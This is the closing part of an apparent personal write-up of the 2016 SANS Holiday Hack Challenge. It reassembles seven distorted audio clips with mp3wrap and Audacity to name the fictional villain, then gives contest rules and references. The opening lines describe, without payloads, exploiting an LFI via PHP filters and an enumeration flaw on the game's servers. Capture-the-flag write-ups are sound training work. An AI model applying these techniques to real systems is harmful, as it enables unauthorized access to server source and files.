- There was an LFI (local file inclusion) vulnerability in the exception.php file. By editing the JSON key values used to read crash dumps written to the server, you can use PHP filters to base64-encode the exception resource on the server. Decoding it provides the source code for the site hosted on the server: discombobulated-audio-6-XyzE3N9YqKNH.mp3
- The file was found using the ‘unknown’ parameter after acquiring the source code for the site. This was on the Mobile Analytics Server. There was a vulnerability that allowed me to enumerate the audio file and exfiltrate it: discombobulatedaudio7.mp3
Please note: Although each system is remotely exploitable, we DO NOT expect every participant to compromise every element of the SantaGram infrastructure. Gain access to the ones you can. Although we will give special consideration to entries that successfully compromise all six vulnerabilities and retrieve their audio files, we happily accept partial answers and point out that they too are eligible for any of the prizes.
Part 5: Discombobulated Audio
Josh sighed as he scratched his head. “Hey, sis. We’ve managed to own much of the SantaGram infrastructure, but all we’ve got to show for it is these strangely distorted audio files. They sound weird, as though they’ve been all discombobulated somehow. We certainly haven’t found the criminal who abducted Santa. Also, there’s that one door at the North Pole we haven’t been able to get open yet. Very curious, I tell you.”
Something Joshua just said triggered Jessica’s memory. “I recall seeing a weird machine here at the North Pole called ‘The Audio Discombobulator.’ Remember it? It mentioned how it cuts, mixes, and stirs songs together, and then distributes them throughout the North Pole. I guess that explains the music that saturates everything up here. Perhaps these weird audio files came from that machine… but they don’t sound much like music, and certainly not whole songs.”
“What if…” Josh contemplated, “…the villain walked by the Audio Discombobulator and uttered something… Not a song, which the machine is used to dealing with, but instead a sentence or a phrase. The machine might have heard that, cut it up, mixed it, and then distributed it throughout the North Pole!”
Jess concluded the thought, “Wow! Let’s see if we can put the pieces of this crazy audio puzzle back together. It might help us find the bad guy.”
And, finally, Dear Reader, now is your chance to bring the foul villain who nabbed Santa to justice. Analyze the audio files and find the villain in the North Pole to answer these questions:
9) Who is the villain behind the nefarious plot.
Is that a question or a statement? Just now realizing this four years later. Regardless, I didn’t catch this when I was younger. So, I’ll provide the steps I utilized to finish this up.
When I first looked at the audio files throughout the challenge I noticed that they’d been slowed to a point that rendered them incomprehensible. The following is a listing of the files.
root@solitude:~/Desktop/Audio Files# ls
discombobulatedaudio1.mp3 discombobulatedaudio5.mp3
discombobulatedaudio2.mp3 discombobulated-audio-6-XyzE3N9YqKNH.mp3
discombobulatedaudio3.mp3 discombobulatedaudio7.mp3
discombobulatedaudio4.mp3
Using a tool named mp3wrap(1), I concatenated the audio files in order from one to seven. Mp3Wrap is a command line utility that wraps multiple audio files into one, in the order they're specified after the output file name. Used the following command to do this.
mp3wrap discombobulatedaudio1-7.mp3 discombobulatedaudio1.mp3 discombobulatedaudio2.mp3 discombobulatedaudio3.mp3 discombobulatedaudio4.mp3 discombobulatedaudio5.mp3 discombobulated-audio-6-XyzE3N9YqKNH.mp3 discombobulatedaudio7.mp3
Mp3Wrap Version 0.5 (2003/Jan/16). See README and COPYING for more!
Written and copyrights by Matteo Trotta - <matteo.trotta@lib.unimib.it>
THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTY! USE AT YOUR OWN RISK!
14 % --> Wrapping discombobulatedaudio1.mp3 ... OK
28 % --> Wrapping discombobulatedaudio2.mp3 ... OK
42 % --> Wrapping discombobulatedaudio3.mp3 ... OK
57 % --> Wrapping discombobulatedaudio4.mp3 ... OK
71 % --> Wrapping discombobulatedaudio5.mp3 ... OK
85 % --> Wrapping discombobulated-audio-6-XyzE3N9YqKNH.mp3 ... OK
100 % --> Wrapping discombobulatedaudio7.mp3 ... OK
Calculating CRC, please wait... OK
discombobulatedaudio1-4_MP3WRAP.mp3 has been created successfully!
Use mp3splt to dewrap file; download at http://m3splt.sourceforge.net!
Once the new file was generated, I dropped the audio file into Audacity and started playing with the tempo-changing effect, periodically previewing the sound of the audio. The sound started to improve after increasing the tempo by about 400%, but I was only hearing bits and pieces. When I increased the tempo by 800%, I could hear the phrase clearly.
- “Father Christmas Santa Claus or as I’ve always known him Jeff”
This is a quote from the Doctor Who episode, A Christmas Carol. I googled it. This is the password for opening the door to the hidden corridor.
10) Why had the villain abducted Santa?
Doctor Who is the villain behind this. He can be found through the hidden corridor by using the password provided by the audio files. Doctor Who abducted Santa to prevent the Star Wars Holiday Special from happening in our timeline. I guess Dr. Who isn't a fan. He states that he looked into the time vortex and saw a universe where it didn't exist, and that people were happier there. Dr. Who obviously has no chill. I've honestly never watched the Star Wars Holiday Special. I will provide the dialog below.
<Dr. Who> - The question of the hour is this Who nabbed Santa.
<Dr. Who> - The answer? Yes, I did.
<Dr. Who> - Next question Why would anyone in his right mind kidnap Santa Claus?
<Dr. Who> - The answer. Do I look like I'm in my right mind? I'm a madman with a box.
<Dr. Who> - I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday
Special was NEVER released. In that universe, 1970 came and went as normal. No one had to endure the misery
of watching that abominate blight. People were happy there. It's a better life, I tell you, a better world
than the scarred one we endure here.
Please note: You can determine the plot and the identity of the villain with access to as few as five of the seven audio files. However, as stated above, participants who gain access to all seven audio files will be given special consideration. Again, you do not need to compromise all the SantaGram servers to answer items 9 and 10. Partial answers are completely welcomed and are certainly eligible to win.
Epilogue: Bringing It All Home
With Santa’s rescue and the discovery of his abductor, the Dosis children were finally satisfied that Christmas was now safe. They contacted their father’s friends in law enforcement to ensure the villain would pay for his crime.
And that, Dear Reader, is the story of how you helped the Dosis children save Christmas and preserve the whole holiday season yet again.
Please answer each question by January 4, 2017*, sending your description of how you unraveled each one to SANSHolidayHackChallenge@counterhack.com . From all submitted entries, we’ll pick ten winners, according to the following plan:
- Seven random draw answers selected from all entries, regardless of how complete or incomplete they are
- The best technical answer
- The most creative answer that is technically correct
- The best overall answer, our Grand Prize Winner
- Remember, even if you can’t answer one or more of the questions, please do send in an answer of any kind to be entered in that random draw. Seriously, if you get 50%, 80%, or 98% of the answers, you’ll still be eligible to win.
The seven random draw answers will receive a much coveted, beautiful, and soft-to-the-touch NetWars T-Shirt.
The best technical answer and most creative answer winners will receive a subscription to NetWars Continuous, with 4 months of access to the exciting SANS cyber range to develop skills, have fun, and earn CPEs!
And, check this out:
The Grand Prize** for the SANS Holiday Hack Challenge is one free SANS Online Training course of your choice! The winner will choose from any of SANS’ 30+ Online Courses, and will complete SANS training at their own pace from anywhere on the Internet.
Happy Holidays!
–Counter Hack and Friends
- Any time zone on planet Earth will do.
SANS will choose only one winner for the Grand Prize. The SANS Online Training seat is not transferable to another person or event and does not include a certification attempt. No substitutions are allowed for the SANS Online Training seat. For any of these prizes, SANS is not responsible for lost, late, or unintelligible entries, lost connections, miscommunications, failed transmissions, other technical difficulties or failures.
References
I provided some references that I used to finish this. Perhaps this list may be useful to anyone else in the future as well.
But perhaps they won't be. I've been finding that some of these links are no longer available. I have also looked for the articles online, but cannot find them.
- Mining Meteor - Meteor Framework Vulnerability
- Getting Moar Value Out of PHP Location File Include Vulnerabilities
- Joshua Wright's presentation from HackFest 2016
- Meteor Framework
- SANS Pen Test - How To’s: Manipulating Android Applications - Video on manipulating Android applications
- For mounting Raspberry Pi images - https://pen-testing.sans.org/blog/2016/12/07/mount-a-raspberry-pi-file-system-image
- Man Pages – sudo(1), strings(1), tcpdump(1), find(1), silver-searcher-ag(1), apktool(1), nmap(1), grep(1), xxd(1) etc.